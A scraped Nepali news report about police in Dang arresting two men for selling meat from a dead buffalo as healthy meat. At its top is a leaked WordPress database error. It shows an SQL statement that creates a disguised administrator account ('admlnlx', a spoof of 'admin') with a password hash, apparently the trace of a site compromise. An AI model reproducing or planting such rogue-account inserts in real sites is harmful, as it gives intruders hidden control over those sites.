WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Br081Oi6gQSHY3xzfU.T.i83TQcojK1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:13:42', '', 'admlnlx', 'admlnlx')
तुलसीपुर,पुस १ –
दाङमा मरेको भैसीको मासु झुक्काएर बिक्री वितरण गर्दै आएका दुईजना व्यक्तिलाई प्रहरीले पक्राउ गरी कारवाही थालेको छ ।पक्राउ पर्नेमा लक्ष्मीपुर–६ बालिम बनखेतका घरभइ घोराही-११ नयाँ बजारमा मासु पसल गर्दै आएका ३४ बर्षीय किशोर बिश्वकर्मा र २६ बर्षीय कृष्ण बिश्वकर्मालाई पक्राउ गरिएको जिल्ला प्रहरी प्रमुख एसपी धिरज प्रताप सिंहले जानकारी दिए ।
मरेको भैंसीको मासुलाई श्वास्थ मासु भनि उपभोक्तालाई झुक्काएर विर्किवितरण गर्ने उदेश्यले रा १ ज ५१३ नम्बरको जिपमा राखि मासु बजारतर्फ लैजाँदै गरेको अवास्थामा उनीहरुलाई पक्राउ गरिएको थियो ।
धर्नादेखि घोराही बजारतर्फ लैजाने क्रममा गोप्य सूचनाका आधारमा प्रहरीले उनीहरुलाई पक्राउ गरेको थियो । उनीहरुलाई अनुसन्धानका लागि प्रहरी हिरासतमा राखिएको छ ।